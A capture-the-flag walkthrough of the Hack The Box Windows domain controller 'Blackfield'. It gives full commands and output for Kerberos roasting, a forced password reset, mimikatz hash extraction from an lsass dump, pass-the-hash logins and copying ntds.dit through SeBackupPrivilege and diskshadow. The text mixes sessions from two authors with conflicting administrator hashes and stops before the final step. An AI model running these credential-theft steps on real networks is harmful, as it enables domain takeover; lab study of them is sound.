Column Details
Name Blackfield
IP 10.10.10.192
Points 40
Os Windows
Difficulty Hard
Creator aas
Out On 06 June 2020

Brief@Blackfield:~$

Well the journey starts from a smb share which has a lot of dirs that turned out to be usernames . Generating TGT for a valid user and cracking it with john.Now i can login to rpcclient the user has permissions to chnage another users’s password , Thats what we need ,Chnaged the pass and Got access to another share which contain a .zip file , Unzipping it we have a Memory Dump file . Dumping it with mimikatz gave us NTLM hash of a user.Logged in using Evil-Winrm . The user can backup the files since it has rights to do it . Backup the ntds.dit and getting the SYSTEM file , Dumping the NTLM hash from the files using secretdump , Got ntlm hash of administrator.

Summary

  • Anonymous login to the share profiles$
  • Creating a text file with the dirnames
  • Generating a TGT for a valid user saving it in a file
  • Cracking the hash with John
  • Login to the rpcclient
  • Changing the audit2020 password to want i want.
  • Enumerating the share forensic
  • Got a zip file lsass.zip , Unzipping it
  • Got a memory Dump file lsass.DMP
  • DUmping NTLM hash from the file using mimikatz
  • Login as svc_backup
  • Got User.txt
  • the user svc_backup can backup the files
  • using diskshadow to create a new volume with alias of c:
  • Copying the ntds.dit
  • Saving the registry file SYSTEM
  • Cracking the NTLM hash from the files using secretdump.py
  • Login as administrator
  • Got root.txt

Pwned

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>


Recon

Nmap

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat allports.nmap 
# Nmap 7.92 scan initiated Wed Sep 28 13:50:04 2022 as: nmap -Pn -sV -sC -T4 -p- -v -oN allports.nmap 10.10.10.192
Increasing send delay for 10.10.10.192 from 0 to 5 due to 55 out of 136 dropped probes since last increase.
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.090s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-28 18:58:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m29s
| smb2-security-mode: 
| 3.1.1: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2022-09-28T18:58:40
|_ start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 28 13:58:46 2022 -- 1 IP address (1 host up) scanned in 522.15 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]

….the machine is about active-directory the ports that are opened are saying that ….

enum4linux

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $enum4linux blackfield.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Sep 28 13:52:44 2022

========================== 
| Target Information |
========================== 
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================== 
| Enumerating Workgroup/Domain on blackfield.htb |
====================================================== 
[E] Can't find workgroup/domain


============================================== 
| Nbtstat Information for blackfield.htb |
============================================== 
Looking up status of 10.10.10.192
No reply from 10.10.10.192

======================================= 
| Session Check on blackfield.htb |
======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server blackfield.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

============================================= 
| Getting domain SID for blackfield.htb |
============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)

.

Got the domain name BLACKFIELD from the enum4linux

Smbclient

tried to login anonymously , I enumerated for available shares and here is what i got.

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $smbclient -L blackfield.htb
Enter WORKGROUP\puck's password:

Sharename Type Comment
--------- ---- -------
ADMIN$    Disk Remote Admin
C$        Disk Default share
forensic  Disk Forensic / Audit share.
IPC$      IPC Remote IPC
NETLOGON  Disk Logon server share 
profiles$ Disk 
SYSVOL    Disk Logon server share 
SMB1 disabled -- no workgroup available
┌─[puck@parrot-lt]─[~/htb/blackfield]
.

Okay…so basically we have almost 2 shares

  • forensic
  • profiles$

I tried to login myself to the share forensic

forensic share

1
2
3
4
5
6
➜   smbclient  //blackfield.htb/forensic             
Enter WORKGROUP\roots password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>

But we are not allowed to enumerate this share …move on

┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $sudo mount -t cifs -o username=anonymous,domain=blackfield.local //10.10.10.192/profiles$ /mnt/profiles
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls -1 /mnt/profiles/ > userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $

If we look closely at the every dir name , They are more than enough to understand that these are usernames

Let’s check which are valid users

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $/opt/kerbrute/kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 userlist.txt -t 100

__ __ __ 
/ /_____ _____/ /_ _______ __/ /____ 
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/28/22 - Ronnie Flathers @ropnop

2022/09/28 14:26:02 > Using KDC(s):
2022/09/28 14:26:02 > 10.10.10.192:88

2022/09/28 14:26:08 > [+] VALID USERNAME: audit2020@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: support@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: svc_backup@blackfield.local
2022/09/28 14:26:23 > Done! Tested 314 usernames (3 valid) in 20.819 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]

Using GetNPuser.py to get tgt

Now since we have users for the machine we can use GetNPuser from the impacket so we can generate a TGT for any valid user on the machine , I will generate the hash in john format so i can use john the ripper to crack the hash.

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.LOCAL/ -usersfile validusers.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User audit2020@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat hashes.txt 
$krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL:e51263a437b0eabadb88c806f5d899e0$4f2736792ae460f97724a3d56bb0fcdd81242deb1c7196297198832155cb33d944e191ff107af1b56684c9f5af1240ba0622a6aa966f8d1a17e2fa736720f2c1c9cb6cc2f9ed6087312d7536f6dc4c07fbe0c0c9e208cb578748fbe6d2e30d015e457c364e348f6638cadbb653d4e6ac93073b5ab335914e25b7bf30667a1054d1f8ac8be95825c2549a9ee5ad71f9c117b4265c9cbd05584f8b613d9e33298b31a7c2d4cdf8f1814f6c3110a3698b988cd505cb76e6927343c33f626974fd6c9134df56a615a5b83ac4750185c8a492ace85575f7ef3e7addb63cbc662b5cf36158e0c6c0ef2ec00ae0e063a8967a245d8ebad1
┌─[puck@parrot-lt]─[~/htb/blackfield]

Time to crack it with john

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $john hashes.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL)
1g 0:00:00:14 DONE (2022-09-28 14:32) 0.06863g/s 983939p/s 983939c/s 983939C/s #1WIF3Y.."chito"
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $

and we we cracked it gently….

The creds are valid for SMB, not for WINRM

┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight 
┌─[puck@parrot-lt]─[~/htb/blackfield]

.

 

Login into rpcclient

After enumerating here and there that where to use the credentials , I logged in myself to rpcclient

Enumerating users

https://ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging

1
2
3
4
5
6
7
8
9
10
11
➜  blackfield rpcclient 10.10.10.192 -U support 
Enter WORKGROUP\supports password:#00^BlackKnight 
rpcclient $> enumdomusers 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
user:[admin1] rid:[0x13ed]

These are the avalilable users on the machine

Getting info about current user

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
rpcclient $> queryuser support
        User Name   :   support
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 10 Jun 2020 16:41:38 EDT
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST
        Password last set Time   :      Sun, 23 Feb 2020 12:53:24 EST
        Password can change Time :      Mon, 24 Feb 2020 12:53:24 EST
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x450
        group_rid:      0x201
        acb_info :      0x00010210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000000b
        padding1[0..7]...
        logon_hrs[0..21]...

available privileges

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)
rpcclient $> 

These are some available privs that the current user have ….From the few of the above privs i concluded that the user can change the other user’s password.

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

I tried almost all the available users and i got succeed on the user audit2020 to change its password…

rpcclient $> setuserinfo2 audit2020 23 'Geheim123!'

checked ldap, but nothing interesting found

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ldapsearch -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight' > support_ldap_dump
┌─[puck@parrot-lt]─[~/htb/blackfield]

tried kerberoasting, but none found

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

No entries found!
┌─[puck@parrot-lt]─[~/htb/blackfield]

.

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 52 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 20S
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls
20220928150457_computers.json allports.nmap users.txt
20220928150457_domains.json hashes.txt validusers.txt
20220928150457_groups.json support_ldap_dump
20220928150457_users.json userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]

.

 

And now i can login myself to the smbclient to enumerate the share forensic….

1
2
3
4
5
6
7
8
9
10
11
12
smbclient  //blackfield.htb/forensic -U audit2020
Enter WORKGROUP\audit2020s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                7846143 blocks of size 4096. 3523743 blocks available
smb: \> 

Well…the user audit2020 has permissions to read the share

Got the file lsass.zip

After some manual enum i got a .zip file called lsass.zip from the dir memory_analysis , its was hard to find this file amongst so many files

1
2
3
4
5
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now

➜  blackfield 

But i got a NT_STATUS_IO_TIMEOUT error when i was downloading the file …. Maybe the file size is too large

Mounting the share locally

i can also mount the share forensic to my machine and i can enumerate the dirs like some regular ones.

mount using the mount utility from cifs.utility

1
2
3
➜  blackfield mount -t cifs //10.10.10.192/forensic /mnt -o user=audit2020
Password for audit2020@//10.10.10.192/forensic:  **********
➜  blackfield

Now i can head towards the /mnt dir for sure

1
2
3
➜  /mnt ls
commands_output  memory_analysis  tools
➜  /mnt 

and now i can copy the zip file from here

1
➜  memory_analysis cp lsass.zip /home/prashant/

unzipping the file

1
2
3
4
➜  prashant unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP               
➜  prashant 

Well .DMP file is a memory dump file which been created when the program crahses or something went wrong….

It can be sometime useful to dump useful information from it , Thats why mimikatz has a feature to dump useful information from it like , NTLM hash

i copied the .DMP file to my windows machine and Download mimikatz in it

Disable the virus-protection from windows to download mimikatz

https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf

https://github.com/gentilkiwi/mimikatz/releases

Load your mimikatz.exe

 

sekurlsa::minidump /users/0xPrashant/Desktop/lsass.DMP

 

sekurlsa::LogonPasswords

 

And done !! i got basically two users hash

  • svc_backup
  • administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
Opening : '/users/0xPrashant/Desktop/lsass.DMP' file for minidump...

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session           : Interactive from 2
User Name         : svc_backup
Domain            : BLACKFIELD
Logon Server      : DC01
Logon Time        : 23-02-2020 23:30:03
SID               : S-1-5-21-4194615774-2175524697-3563712290-1413
        msv :
         [00000003] Primary
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * NTLM     : 9658d1d1dcd9250115e2205d9f48400d
         * SHA1     : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
         * DPAPI    : a03cd8e9d30171f3cfe8caad92fef621
        tspkg :
        wdigest :
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * Password : (null)
        kerberos :
         * Username : svc_backup
         * Domain   : BLACKFIELD.LOCAL
         * Password : (null)
        ssp :
        credman :


Authentication Id : 0 ; 153705 (00000000:00025869)
Session           : Interactive from 1
User Name         : Administrator
Domain            : BLACKFIELD
Logon Server      : DC01
Logon Time        : 23-02-2020 23:29:04
SID               : S-1-5-21-4194615774-2175524697-3563712290-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : BLACKFIELD
         * NTLM     : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
         * SHA1     : db5c89a961644f0978b4b69a4d2a2239d7886368
         * DPAPI    : 240339f898b6ac4ce3f34702e4a89550
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : BLACKFIELD
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : BLACKFIELD.LOCAL
         * Password : (null)
        ssp :
        credman :

There is a administrator NTLM hash but i dont think this will be that easy

1
2
3
4
5
6
7
8
9
10
11
➜  prashant evil-winrm -i 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

➜  prashant

As expected it didnt work….move on

Login as svc_backup

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
┌─[puck@parrot-lt]─[~/htb/blackfield]

I tried the second NTLM hash that is of svc_backup user

1
2
3
4
5
6
7
8
  prashant evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d   

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup

Got user.txt

1
2
3
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
8ac------------------------------bd
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

Privilege escalation to root

Root is as simple as i didnt even think….

whoami /all

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

As from the output these are some interesting ones which suits to the username svc_backup….

1
BUILTIN\Backup Operators

1
SeBackupPrivilege             Back up files and directories  Enabled

The user svc_backup can backup the data since it has SeBackupPrivilege

it took me some time actually that what to do but some google searches save my time….

Since it is a AD machine and i have perms to backup anyting from the machine , So i am going to backup the NTDS.dit file and the registry file system

The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.

Here is a good explation from a pdf file that how it is going to work !!

https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf

i need to use diskshadow to first make a new volume and alias it with the volume C: so i can read everything from the volume c:

here i made a text file basically a script that will execute commands on the Diskshadow console

1
2
3
4
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:

Uploading the script

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\temp> upload /home/prashant/0xprashant.txt
Info: Uploading /home/prashant/0xprashant.txt to C:\temp\0xprashant.txt

                                                             
Data: 124 bytes of 124 bytes copied

Info: Upload successful!

Executing the script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 3:34:37 PM

-> SET CONTEXT PERSISTENT NOWRITER

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

        CLIENTACCESSIBLE        Specify to create shadow copies usable by client versions of Windows.
        PERSISTENT              Specify that shadow copy is persist across program exit, reset or reboot.
        PERSISTENT NOWRITERS    Specify that shadow copy is persistent and all writers are excluded.
        VOLATILE                Specify that shadow copy will be deleted on exit or reset.
        VOLATILE NOWRITERS      Specify that shadow copy is volatile and all writers are excluded.

        Example: SET CONTEXT CLIENTACCESSIBLE

Got an error of like this…..If i look at the error it is complaing about the -> SET CONTEXT PERSISTENT NOWRITER but in my script it is NOWRITERS not NOWRITER .

Then i figured it out that the last character from the line is being delted and then its used

I added an extra dummy character at the last of every line

1
2
3
4
5
➜  prashant cat 0xprashant.txt 
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p

like this……………!!!!!!

Running again

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 3:41:15 PM

-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias 0xprashant
-> create
Alias 0xprashant for shadow ID {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9} set as environment variable.

Querying all shadow copies with the shadow copy set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9}

        * Shadow copy ID = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}               %0xprashant%
                - Shadow copy set: {c38f96e5-6d7e-49f8-b605-25b0b25934e9}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/10/2020 3:41:17 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %0xprashant% z:
-> %0xprashant% = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}
The shadow copy was successfully exposed as z:\.

This time it ran smoothly….

Now its ime to copy the NTDS.dit file , There is a tool on github that will do this thing for me….

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Upload the two dll files to the machine and then simply import them

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/prashant/SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll

                                                             
Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeUtils.dll
Info: Uploading /home/prashant/SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll

                                                             
Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

Importing the scripts

1
2
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll

Copying the NTDS.dit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/10/2020   3:37 PM             98 0xprashant.txt
-a----        6/10/2020   3:39 PM            636 2020-06-10_15-39-54_DC01.cab
-a----        6/10/2020   3:41 PM            627 2020-06-10_15-41-18_DC01.cab
-a----        6/10/2020   3:51 PM       18874368 ndts.dit
